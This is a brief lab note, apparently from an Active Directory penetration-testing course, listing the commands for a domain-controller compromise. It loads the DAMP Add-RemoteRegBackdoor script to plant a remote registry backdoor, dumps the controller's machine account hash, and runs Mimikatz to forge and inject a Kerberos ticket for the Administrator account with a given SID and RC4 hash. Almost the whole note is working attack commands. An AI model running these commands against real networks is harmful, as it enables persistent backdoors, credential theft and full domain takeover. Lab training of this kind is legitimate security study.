Property
Links
Load Add-RemoteRegBackdoor
. .\DAMP-master\Add-RemoteRegBackdoor.ps1Modify trustee privileges
Add-RemoteRegBackdoor -ComputerName dcorp-dc.dollarcorp.moneycorp.local student518 -VerboseCan then dump the machine account hash for the domain controller, and use it to log in
.\DAMP-master\RemoteHashRetrieval.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc.dollarcorp.moneycorp.local -VerboseRun Mimikatz against the administrator user, with the appropriate SID
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:529042dc78d388fdab3cf9eba1a0903e /user:Administrator /ptt"'